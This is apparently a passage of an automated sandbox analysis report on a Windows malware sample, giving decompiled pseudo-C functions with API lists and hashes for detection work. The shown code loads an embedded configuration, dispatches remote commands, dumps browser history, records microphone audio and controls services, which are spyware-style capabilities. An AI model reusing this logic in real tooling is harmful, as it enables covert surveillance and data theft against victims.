                                                                                • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                                                                • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                                                                • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409823, Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E00409823(intOrPtr _a4) {
				unsigned int _v8;
				signed char* _v12;
				char _v13;
				void* _v20;
				void* _v24;
				char _v40;
				void* _v56;
				char _v1080;
				void* _t36;
				signed int _t38;
				signed int _t42;
				int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t66;
				signed char* _t76;
				void* _t83;
				void* _t88;
				void* _t89;

				_v12 = _v12 & 0x00000000;
				_v8 = E00409D02( &_v12);
				_t51 =  *_v12 & 0x000000ff;
				_t36 = malloc(_t51);
				_t76 = _v12;
				_t54 = _t51;
				_t7 = _t76 + 1; // 0x1
				_t88 = _t7;
				_v24 = _t36;
				_t55 = _t54 >> 2;
				memcpy(_t36, _t88, _t55 << 2);
				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
				_t83 = malloc(_v8);
				_t42 = _v12;
				_v20 = _t83;
				_t20 = _t42 + 1; // 0x1
				_t89 = _t51 + _t20;
				_t66 = _v8 >> 2;
				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
				E00402F9B( &_v1080, _v24, _t51);
				E0040309E( &_v1080,  &_v40, _v20, _v8);
				free(_v20);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _a4;
			}






















                                                                                0x0040982c
                                                                                0x0040983c
                                                                                0x00409842
                                                                                0x00409846
                                                                                0x0040984c
                                                                                0x00409853
                                                                                0x00409855
                                                                                0x00409855
                                                                                0x0040985a
                                                                                0x0040985d
                                                                                0x00409860
                                                                                0x00409867
                                                                                0x00409872
                                                                                0x0040987e
                                                                                0x00409887
                                                                                0x00409892
                                                                                0x0040989e
                                                                                0x004098a0
                                                                                0x004098a4
                                                                                0x004098aa
                                                                                0x004098aa
                                                                                0x004098b1
                                                                                0x004098be
                                                                                0x004098c6
                                                                                0x004098db
                                                                                0x004098e3
                                                                                0x004098f1
                                                                                0x004098fa
                                                                                0x00409907

                                                                                APIs
                                                                                  • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                                                                  • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                                                                  • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                                                                  • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                                                                • malloc.MSVCRT ref: 00409846
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                                                                • malloc.MSVCRT ref: 00409898
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                                                                • String ID:
                                                                                • API String ID: 531887698-0
                                                                                • Opcode ID: 537d00d0b91bc4c659ca58b4795d880a0a3ac7295881093653a66409a3579479
                                                                                • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                                                                • Opcode Fuzzy Hash: 537d00d0b91bc4c659ca58b4795d880a0a3ac7295881093653a66409a3579479
                                                                                • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401A5E, Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
				char _v20;
				char _v36;
				void* _t18;
				void* _t20;
				intOrPtr _t39;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t39 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t18 = _t39 - 0x9b;
				if(_t18 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
					 *0x41b288 = 1;
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(0x41b240, 0x9c, _t20);
				} else {
					if(_t18 == 0) {
						E00401B26();
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}








                                                                                0x00401a68
                                                                                0x00401a6e
                                                                                0x00401a80
                                                                                0x00401a90
                                                                                0x00401a9f
                                                                                0x00401aa9
                                                                                0x00401ab3
                                                                                0x00401ab8
                                                                                0x00401ad5
                                                                                0x00401ae0
                                                                                0x00401ae7
                                                                                0x00401af2
                                                                                0x00401b02
                                                                                0x00401aba
                                                                                0x00401abc
                                                                                0x00401abe
                                                                                0x00401abe
                                                                                0x00401abc
                                                                                0x00401b0a
                                                                                0x00401b12
                                                                                0x00401b1b
                                                                                0x00401b25

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 00401A80
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                                                                  • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                                                                  • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                                                                  • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                                                                  • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                                                                  • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                                                                  • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                                                                  • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                                                                  • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                                                                  • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                                                                  • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                                                                  • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                                                                • String ID:
                                                                                • API String ID: 573486607-0
                                                                                • Opcode ID: 77ddacf53b0e59390d1cd889b5acedb5f46201a6807b72dd8ddeb4db2a3f19ee
                                                                                • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                                                                • Opcode Fuzzy Hash: 77ddacf53b0e59390d1cd889b5acedb5f46201a6807b72dd8ddeb4db2a3f19ee
                                                                                • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040DBD7, Relevance: 12.0, APIs: 8, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 51%
                                                                                			E0040DBD7() {
				char* _t7;
				int _t8;
				char* _t9;
				int _t10;
				char* _t11;
				void* _t33;
				void* _t40;

				 *0x41b1f8 = 0;
				_t7 = E0040180C(_t33 - 0x10, 0, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t8 = atoi(_t7);
				_t9 = E0040180C(_t33 - 0x10, 0, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t10 = atoi(_t9);
				_t11 = E0040180C(_t33 - 0x10, 0, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E004010CE(_t40, atoi(_t11), _t10, _t8);
				E004017DD(_t33 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}










                                                                                0x0040dbde
                                                                                0x0040dbe4
                                                                                0x0040dbeb
                                                                                0x0040dbf8
                                                                                0x0040dc01
                                                                                0x0040dc08
                                                                                0x0040dc0f
                                                                                0x0040dc17
                                                                                0x0040dc1e
                                                                                0x0040dc29
                                                                                0x0040e6a4
                                                                                0x0040e6ac
                                                                                0x0040e6b5
                                                                                0x0040e6c1

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DBEB
                                                                                • atoi.MSVCRT ref: 0040DBF8
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DC08
                                                                                • atoi.MSVCRT ref: 0040DC0F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DC1E
                                                                                • atoi.MSVCRT ref: 0040DC25
                                                                                  • Part of subcall function 004010CE: _ftol.MSVCRT ref: 00401134
                                                                                  • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,000000FF,0041B218,0040122D,00000000,00030008), ref: 0040115E
                                                                                  • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                                                                • String ID:
                                                                                • API String ID: 463581448-0
                                                                                • Opcode ID: 2200da0b70681f4d1c0250b84e4ec1b70157c7ac412cde7651218d3b94bdd8f3
                                                                                • Instruction ID: c3a8f3133f02346e86bcb6311be1634d36dcbe797283f91724418690e0411b93
                                                                                • Opcode Fuzzy Hash: 2200da0b70681f4d1c0250b84e4ec1b70157c7ac412cde7651218d3b94bdd8f3
                                                                                • Instruction Fuzzy Hash: 1D01FF72E00218DFDB04BBF1EC599ED7764EB90356B00483EE512E71E1EEB85904CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411859, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00411859(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                                                                0x00411862
                                                                                0x00411868
                                                                                0x00411873
                                                                                0x00411875
                                                                                0x00411883
                                                                                0x00411887
                                                                                0x004118a8
                                                                                0x004118ab
                                                                                0x004118ae
                                                                                0x00411889
                                                                                0x0041188a
                                                                                0x0041188a
                                                                                0x004118b3
                                                                                0x004118bf

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                                                • String ID:
                                                                                • API String ID: 858787766-0
                                                                                • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                                                                • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                                                                • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                                                                • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004118C0, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E004118C0(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                                                                0x004118c9
                                                                                0x004118cf
                                                                                0x004118da
                                                                                0x004118dc
                                                                                0x004118ea
                                                                                0x004118ee
                                                                                0x0041190f
                                                                                0x00411912
                                                                                0x00411915
                                                                                0x004118f0
                                                                                0x004118f1
                                                                                0x004118f1
                                                                                0x0041191a
                                                                                0x00411926

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                                                • String ID:
                                                                                • API String ID: 858787766-0
                                                                                • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                                                                • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                                                                • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                                                                • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411760, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00411760(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x20);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x20);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                                                                0x00411769
                                                                                0x0041176f
                                                                                0x0041177a
                                                                                0x0041177c
                                                                                0x0041178a
                                                                                0x0041178e
                                                                                0x004117af
                                                                                0x004117b2
                                                                                0x004117b5
                                                                                0x00411790
                                                                                0x00411791
                                                                                0x00411791
                                                                                0x004117ba
                                                                                0x004117c6

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
